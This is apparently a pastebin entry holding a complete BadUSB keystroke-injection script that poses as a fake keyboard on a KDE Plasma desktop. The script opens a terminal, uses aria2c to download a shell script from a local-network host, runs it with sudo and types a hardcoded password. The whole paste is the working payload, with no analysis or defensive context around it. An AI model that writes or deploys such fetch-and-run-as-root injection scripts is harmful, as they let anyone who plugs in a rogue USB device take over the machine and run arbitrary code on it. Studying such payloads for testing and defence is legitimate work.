Paste #277329

   
pasted on 11.09.2024 13:35
  • Edit to this paste
  • Print
  • Raw
  • Compare with paste
    #  
  • Toggle line numbers
  • Syntax highlighting  
Text paste
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
ID 1234:5678 NoName:FakeKeyboard

REM This is BadUSB test script for Plasma

REM Open terminal window
DELAY 1000
ALT F2
DELAY 1000
ENTER
DELAY 1000
STRING konsole
DELAY 1000
ENTER
DELAY 2000
STRING aria2c http://192.168.10.20:9000/tune.sh
DELAY 2000
ENTER
STRING sudo bash ./tune.sh
DELAY 500
ENTER
STRING password1234567
DELAY 500
ENTER
Add Comment
Author